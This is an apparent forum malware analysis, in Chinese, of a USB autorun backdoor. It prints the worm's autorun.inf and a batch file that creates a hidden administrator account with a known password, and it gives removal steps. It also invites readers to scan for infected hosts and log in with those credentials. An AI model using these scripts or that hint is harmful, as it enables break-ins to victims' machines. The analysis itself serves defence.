信息来源:邪恶八进制 中国(
www.eviloctal.com)
文章作者:sunlion[E.S.T](血舞[E.S.T])
前几天,计算机中了个病毒,也可以说是个黑客软件,后门木马,因为中毒的计算机没什么大的影响(假如不被别人入侵的话);由于前几天一直忙课程设计,没时间去理会它,今天答辩完了,拿出来分析一下;
首先,看看病毒的特征:
中病毒的计算机,都会添加一个lee的用户(密码先不告诉大家),并把lee添加到administrators组中;在每个盘的更目录下都会有四个文件(正常情况下用户看不到,包括你把计算机设置改为显示所有文件,也无法看到这四个文件)分别为:admin.bat ;autorun.inf;system32.exe;system32dll.dll;
前面我说过,即使你把系统设置为显示所有文件,那四个文件也是无法看到的,那我是怎么看到他们的呢!我结束了软件,我用到的就是cuteftp软件,他可以看到盘上的所有文件,只要你用CUTEFTP软件看到了就可以用到它右键功能就可以把病毒一个一个的删除了!
其他软件我估计也可以的,比如ACDSEE的浏览功能!
现在先让大家看两副图:
大家看到了没有,现在在G盘下是看不到的,而且我已经把系统设置为显示所以文件了;
;
但是在cuteftp下,我们就可以看到这四个文件:
大家看到了没有,在左边的小窗口内,显示的就是我G盘下的那四个文件了!好了大家如果想检查的话,也可以按我的这个技巧去检查以下你的系统了!下面我们进行一些简单分析:
A:先让我们来看看这个autorun.inf文件;
在cuteftp里右键点这个文件,选择查看,就会看到这个窗口:
他全部代码如下:
[autorun]
open=System32.exe,到这里有点人会说,我看不懂啊!
为了照顾大多数读者,作者把它写得详细一点:
先让我们来了解一下AutoRun.inf启动方式
Autorun.inf这个标识也许大家都见过。这个最常出现在光盘中,用于光盘自启动。每次把光盘放入光驱中的时候,系统会通过这个文件来决定是否自动启动光盘。但是有没有想过,这个文件也可以用来自启动一些文件!
Autorun.inf的内容通常是:
[AUTORUN]
OPEN=file.exe
ICON=icon.ico
OPEN中是插入光盘或者双击光盘盘符就会运行的可执行文件的名称。
ICON中是该光驱驱动器的图标文件。该文件可以是其他文件。如:
[AUTORUN]
OPEN=file.exe
ICON=icon.exe,2
其中icon.exe是一个有图标文件的可执行文件,“,2”则是该文件中的第3个图标。(“,0”是第一个图标,无数字则默认为第一个图标)。
最关键的是该Autorun.inf文件是可以被用在硬盘的驱动器上的。也就是说,如果把光盘上的所有文件及目录原封不动的复制到某一硬盘的根目录下,则双击盘符会出现自动运行文件!
注意:
1.autorun.inf的属性被改为隐藏后仍可以正常使用。
2.autorun.inf中的路径对相对路径和绝对路径都是可以实现的。也就是说,如果autorun.inf被放在1盘符下,也可以2盘符上的文件!如:
如果把autorun.inf文件放在C盘根目录下,内容为
[AUTORUN]
OPEN=D:\CCC\bbb.exe
ICON=bbb.exe
则这时如果双击C盘则可以执行D盘CCC目录上的bbb.exe文件!
3.如果没有OPEN项目,则系统不执行任何文件,而去执行下一个命令。
4.如果没有ICON项目,则该盘符的图标为原Windows盘符图标,但如果有ICON项却设置错误,或者所设置的文件没有图标,则系统会显示为默认的空白图标。
读到这里读者应该知道病毒的autorun.inf的用意了吧——就是只要用户打开那个存在病毒的盘(上面提到过,这四个文件是放在根目录下的),那么autorun.inf就开始起作用了,[autorun]
open=System32.exe,就会运行,system32.exe的文件;
B:在让我们来看看admin.bat的文件
同样的方法,在cuteftp里用右键也可以点查看,也看到这个窗口:
全部代码如下:
net user lee abcd1234!@# /add
net localgroup administrators lee /add
大家都知道批处理文件吧,大家看到这里都应该知道,为什么我们的系统会无缘无故的多出了一个lee用户了吧,而且病毒会把这个lee用户添加到administrators组中;至于病毒是怎么运行到这个admin.bat的,大家不用想都知道,就是前面运行的system32.exe文件,就是他调用到里这个admin.bat的批处理文件;这里把密码也告诉大家,估计对一些兄弟有用!因为我说过这个是个后门木马软件,它打开了3389的功能,至于端口是多少作者就不告诉大家了,大家可以自己去分析,做试验,自己就会得出结论了!当你得到这个病毒的端口后,用软件扫描这个特征端口,用上面的用户和密码连端口,估计进入被感染的计算也就没问题了,剩下的有兴趣的朋友可以自己去试验!本来想把这个病毒修改注册表的地方也想把它写出来,但是由于时间有限我就不写,大家可以自己去研究!用regsnap这个软件来监视注册表,就可以办到了!如果大家想研究这个病毒请联系,冰血封情!
http://www.eviloctal.com或者到E.S.T论坛来讨论!此共大家研究所用,如用如非法,与作者无关!
后记:1.对于这个病毒的隐藏作者很感兴趣,又进行了一翻研究,它们是怎么做到,把系统设置为显示所有文件和文件夹,还是看不到他们呢!原来病毒把那四个文件设置为了隐藏的系统文件,所以我们就看不到了,即使大家把系统设置为了显示所有文件也没有办法!经作者验证,只要大家把,隐藏受保护操作系统文件(推荐),的钩去掉就能看到了!相关图片如下:
2.至于怎么删除呢?有点同学会问,首先,大家一定要把在系统中运行的system32.exe这个进程结素掉,在删除,这样,系统就不会提示,无法删除了,先来说说这个步骤,首先,打开盘,然后结素system32.exe的进程,在删除!
3.这里还会遇到一个问题是,只要你使用ctrl+alt+del调出控制台时,.system32.exe会自动把它关掉,这个也是这个病毒自我保护的一种模式,这里大家可以借助其他软件把.system32.exe结素了,就能删除了!比如绿鹰PC万能精灵,就可以结素·结素这个进程后,就能删除了!
本来还想研究一下的,但是这个病毒这几天在我们学校太流行了,好多同学都不知道怎么办,不知道网络上的兄弟是否也一样,sunlion等不急了,现在先把一部本先发表出来。有时间在继续研究!
